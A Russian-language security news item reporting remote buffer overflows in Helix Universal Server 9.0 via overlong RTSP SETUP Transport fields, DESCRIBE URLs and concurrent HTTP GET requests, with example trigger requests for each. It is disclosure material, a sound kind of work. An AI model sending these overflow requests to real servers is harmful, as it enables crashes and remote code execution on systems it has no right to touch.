Множественные переполнения буфера в Helix сервере

Helix Universal Server - универсальная платформа с поддержкой большинства форматов, включая Real Media, Windows Media, QuickTime, MPEG 4, MP3, MPEG2 и др. В Helix сервере обнаружено несколько возможностей удаленного переполнения буфера.

Сервер Helix использует RTSP протокол, который основан на HTTP протоколе.

Чрезмерно длинная строка символов внутри поля Transport в SETUP RSTP запросе, вызовет переполнение буфера с перезаписью сохраненного адреса возврата на стеке. На Windows системах, Helix сервер по умолчанию установлен как системная служба, в результате успешная эксплуатация уязвимости позволяет атакующему выполнять произвольные команды с системными привилегиями. На UNIX системах, воздействие уязвимости зависит от конкретных платформ. Пример:

SETUP rtsp://www.ngsconsulting.com:554/real9video.rm RTSP/1.0
CSeq: 302
Transport: AAAAAAAAA-->

Передавая очень длинный URL в поле Describe, на 554 порту, нападающий может перезаписать сохраненный адрес возврата, что может привести к выполнению произвольного кода. Пример:

DESCRIBE rtsp://www.ngsconsulting.com:554/AAAAAAAA-->.smi RTSP/1.0
CSeq: 2
Accept: application/sdp
Session: 4668-1
Bandwidth: 393216
ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
Cookie: cbid=www.ngsconsulting.com
GUID: 00000000-0000-0000-0000-000000000000
Language: en-us
PlayerCookie: cbid
RegionData: myregion
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1

Два HTTP запроса (порт 80), содержащих одновременно длинные URL (в первом подключении система похоже зависает, сохраняя этот сеанс открытым), перезапишут сохраненный адрес возврата, позволяя атакующему выполнить произвольный код. Пример:

GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0
User-Agent: RealPlayer G2
Expires: Mon, 18 May 1974 00:00:00 GMT
Pragma: no-cache
Accept: application/x-rtsp-tunnelled, */*
ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
Cookie:
cbid=dfjgimiidjcfllgheokrqprqqojrptnpik
cjkioigjdkfiplqniomprtkronoqmuekigihd
i
X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt

Уязвимость обнаружена в RealNetworks Helix Universal Server 9.0.

Анатолий Ализар: Бывший автор новостной ленты «Хакера». Увлекается современными технологиями, оружием, информационной безопасностью, носимой электроникой и в целом концепцией Internet of Things.